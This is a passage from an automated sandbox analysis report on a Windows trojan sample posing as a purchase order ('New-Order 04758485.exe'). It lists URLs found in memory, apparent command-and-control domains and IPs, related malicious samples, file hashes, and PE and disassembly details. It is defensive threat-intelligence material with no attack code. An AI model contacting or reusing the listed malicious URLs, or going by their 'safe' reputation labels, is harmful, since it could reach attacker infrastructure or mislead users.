          http://www.iqomw.com/crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JH0%Avira URL Cloudsafe
          http://ns.adobe0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://ns.adobe.cK0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.cobjO0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          http://ns.ado/1O0%Avira URL Cloudsafe
          http://ns.adob0%Avira URL Cloudsafe
          http://ns.adobe.cD0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.bendhighswimming.com/crdi/0%Avira URL Cloudsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://ns.adb0%URL Reputationsafe
          http://ns.adb0%URL Reputationsafe
          http://ns.adb0%URL Reputationsafe
          http://logo.verisign0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          3.16.197.4
          truefalse
            high
            www.iqomw.com
            unknown
            unknowntrueunknown
            www.elzooz.com
            unknown
            unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.iqomw.com/crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JHtrue
            • Avira URL Cloud: safe
            unknown
            www.bendhighswimming.com/crdi/true
            • Avira URL Cloud: safe
            low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
              high
              http://www.fontbureau.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                high
                http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                  high
                  http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://ns.adobe.cobjNew-Order 04758485.exe, 00000000.00000003.301805201.0000000006F4C000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://ns.adobe.coNew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                      high
                      http://ns.adobe.c/gONew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://purl.rNew-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ns.adobeNew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.tiro.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://pki.goog/gsr2/GTS1O1.crt0New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://ns.adobe.cKNew-Order 04758485.exe, 00000000.00000003.227490070.0000000006F42000.00000004.00000001.sdmp, New-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                        high
                        http://ns.adobe.c/gNew-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ns.adobe.cobjONew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://pki.goog/repository/0New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ns.ado/1ONew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ns.adobNew-Order 04758485.exe, 00000000.00000003.227284672.0000000006F42000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ns.adobe.cDNew-Order 04758485.exe, 00000000.00000003.227189386.0000000006F42000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.typography.netDexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://fontfabrik.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                            high
                            http://crl.pki.goog/GTS1O1core.crl0New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ns.adbNew-Order 04758485.exe, 00000000.00000003.227583172.0000000006F42000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://logo.verisignexplorer.exe, 0000000B.00000000.331004335.000000000F640000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fonts.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.pki.goog/gsr2/gsr2.crl0?New-Order 04758485.exe, 00000000.00000002.302607546.0000000000F16000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew-Order 04758485.exe, 00000000.00000002.302817037.0000000002A21000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.sakkal.comexplorer.exe, 0000000B.00000000.328332626.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ns.ado/1New-Order 04758485.exe, 00000000.00000003.301790150.0000000006F42000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  3.16.197.4
                                  prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                  16509AMAZON-02USfalse

                                  General Information

                                  Joe Sandbox Version:32.0.0 Black Diamond
                                  Analysis ID:412322
                                  Start date:12.05.2021
                                  Start time:15:58:35
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:New-Order 04758485.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@7/1@2/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 25.4% (good quality ratio 22.2%)
                                  • Quality average: 66.3%
                                  • Quality standard deviation: 35.1%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 172.217.168.68, 131.253.33.200, 13.107.22.200, 184.30.24.56
                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, www.google.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  15:59:35API Interceptor216x Sleep call for process: New-Order 04758485.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  3.16.197.44si5VtPNTe.exeGet hashmaliciousBrowse
                                  • www.topsych.com/bucw/?APw8=pHmd48aeJBSPZZ4oXPqMUa9iB+zw7o9633Qm6JoN2J/ksYljdm2ak3+3AB9oAE45NnYEmo/gHQ==&b62T=5jlLiNy09
                                  BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                  • www.blockchainbiotech.com/bfos/?n6=RpHxKvXHpdiDbnbp&a2JT=nIGyaopHry7E6bdI+FTOLhsX82bxJb3FdwYLplkJtK7ddv9iNxe81y+/5BoFARz6j+UD
                                  PRF00202156KMT.exeGet hashmaliciousBrowse
                                  • www.yelloways.com/epns/?BZ_PRR=g1HyJk+wG0QMozlZ4pSFaEKPb4YO3nGzZZ5CcX3yDfnOXFLur8M6WBwA2Tz5ODgZyyZKu9K6pg==&ctxXOb=9rSHdNip5
                                  Materialliste f#U00fcr Angebot.exeGet hashmaliciousBrowse
                                  • www.gaixuexi.com/mbg/?d4tTFV0x=biSbQxXptFsFatGCwU6rH3jFlmn8/7PXCP5ApA8iXgWtFmg/kZZqbn1fxj5u3vE5BJvNMtq/NQ==&vP=9rQPzxEXvpg8-Jrp
                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                  • www.7chd.com/uoe8/?V2=LhqpTfJ8&rDHpw=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh
                                  new order.xlsxGet hashmaliciousBrowse
                                  • www.beachjunction.com/uoe8/?PbvtUz=UaWDVduFhUYoxBOntLFCG15pALMvw+tGTmrfHTf8nBW+JGuA66stVf5lwBUB/caHaGfK0Q==&-Z=zVeT
                                  2B0CsHzr8o.exeGet hashmaliciousBrowse
                                  • www.herreramedical.com/bncm/?LXedv=rRFZcIV0o2WsZrj/H7Tic0eMA0JUK/5bHF3i9UX4kn8AQLz1xJTIlIEaZDDEVH8ZeF4M&lhv4=O0DPaJ7hHb34yZ

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comPURCHASE ORDER REQUIREMENT.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  4si5VtPNTe.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  PRF00202156KMT.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  Materialliste f#U00fcr Angebot.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                  • 13.59.53.244
                                  KVYhrHPAgF.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  new order.xlsxGet hashmaliciousBrowse
                                  • 3.16.197.4
                                  Purchase Order-070POR044127.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  New order list.exeGet hashmaliciousBrowse
                                  • 13.59.53.244
                                  Request for Quotation.exeGet hashmaliciousBrowse
                                  • 13.59.53.244
                                  2B0CsHzr8o.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  tgix.exeGet hashmaliciousBrowse
                                  • 13.59.53.244
                                  8c2d96ab_by_Libranalysis.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  NEW ORDER.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  Quotation_05052021.Pdf.exeGet hashmaliciousBrowse
                                  • 52.15.160.167
                                  945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exeGet hashmaliciousBrowse
                                  • 3.14.18.91
                                  4GGwmv0AJm.exeGet hashmaliciousBrowse
                                  • 52.15.160.167

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  AMAZON-02US350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                  • 52.58.78.16
                                  7bYDInO.rtfGet hashmaliciousBrowse
                                  • 52.210.171.182
                                  nT5pUwoJSS.dllGet hashmaliciousBrowse
                                  • 54.247.61.18
                                  1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                  • 44.230.85.241
                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                  • 18.219.49.238
                                  main_setup_x86x64.exeGet hashmaliciousBrowse
                                  • 104.192.141.1
                                  A6FAm1ae1j.exeGet hashmaliciousBrowse
                                  • 3.138.180.119
                                  New_Order.exeGet hashmaliciousBrowse
                                  • 75.2.115.196
                                  NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                  • 13.58.50.133
                                  YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                  • 99.83.175.80
                                  yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                  • 99.83.175.80
                                  Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                  • 52.58.78.16
                                  4xPBZai06p.dllGet hashmaliciousBrowse
                                  • 13.225.75.73
                                  0OyVQNXrTo.exeGet hashmaliciousBrowse
                                  • 3.142.167.54
                                  rAd00Nae9w.dllGet hashmaliciousBrowse
                                  • 13.225.75.73
                                  DOC24457188209927.exeGet hashmaliciousBrowse
                                  • 13.224.193.2
                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                  • 104.192.141.1
                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                  • 104.192.141.1
                                  ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                  • 13.113.228.117
                                  PO9448882.exeGet hashmaliciousBrowse
                                  • 18.219.49.238

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New-Order 04758485.exe.log
                                  Process:C:\Users\user\Desktop\New-Order 04758485.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1619
                                  Entropy (8bit):5.337900566095637
                                  Encrypted:false
                                  SSDEEP:48:MIHK5HKXE1qHxvbHK5AHKzvIHmYHKhQnoPtHoxH6HK1HD8mHj:Pq5qXEwRzq2qzAGYqhQnoPtIxH6q17D
                                  MD5:C0DC87FFFF01072EBCBB902D65319450
                                  SHA1:4A6842A765DFE94AF4CF92E0411AA10C75C0EB44
                                  SHA-256:E21F44D67E40BC67307C0DA25FD54CCA1EFD768B3E2479AC6555A6B1942EB697
                                  SHA-512:7555C34F9373ACF381BDA12BBC81A34CF20ABEEDD035B84340D5EACBB3991549B82D5BDAE1D4A73019F6CFDD9F68EBC5BA501C8EAC773BA1B00754589ED5E21D
                                  Malicious:false
                                  Reputation:low
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms.DataVisualization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\ass

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.19960356247498
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Windows Screen Saver (13104/52) 0.07%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:New-Order 04758485.exe
                                  File size:1693696
                                  MD5:ed4361a7909fc65a189b4adaac292991
                                  SHA1:b49fef47c793f39be360ce9a1e2f8bee9e254706
                                  SHA256:914c79c23d30b4df795779800b6e14ac42bec2dc618d11d7c0b526960fc6283c
                                  SHA512:2ec1019b53db86e7c82f28cfea369203fdf2a0c82f6932f34785ef2a4d0e845b800a25df13d1a2e11abcb34cb750eccd59e370f8bdfd99c906c866ad15e72eff
                                  SSDEEP:24576:fBVRWITiQ+diVXMrPyfGOkzrodjHl7NA68qQwV3Z1PGg:nBTiQ7pMPy7kzraDl7R8qQK3z
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.2................................. ........@.. .......................@............`................................

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x59e5ee
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                  Time Stamp:0x32AB54D5 [Sun Dec 8 23:52:53 1996 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
